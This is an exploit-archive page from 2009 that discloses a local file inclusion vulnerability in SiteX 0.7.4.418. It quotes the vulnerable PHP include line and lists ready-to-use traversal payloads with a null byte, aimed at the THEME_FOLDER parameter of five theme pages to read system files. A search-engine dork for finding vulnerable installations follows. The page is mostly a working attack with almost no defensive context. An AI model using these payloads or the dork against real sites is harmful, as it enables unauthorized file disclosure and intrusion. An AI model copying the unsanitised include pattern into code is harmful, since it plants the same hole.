[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SiteX <= 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities
# Published : 2009-05-27
# Author : ahmadbady
# Previous Title : Easy Px 41 CMS v09.00.00B1 (fiche) Local File Inclusion Vulnerability
# Next Title : Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability


=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:SiteX_074_build_418.zip
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://sourceforge.net/project/showfiles.php?group_id=121558&package_id=290027

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/themes/themes_folders/homepage.php
<?PHP
include("themes/$THEME_FOLDER/header.php"); line 2
--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Joombo/homepage.ph?THEME_FOLDER=../../../boot.ini%00
path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork:"Powered by SiteX 0.7 Beta"   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# www.Syue.com [2009-05-27]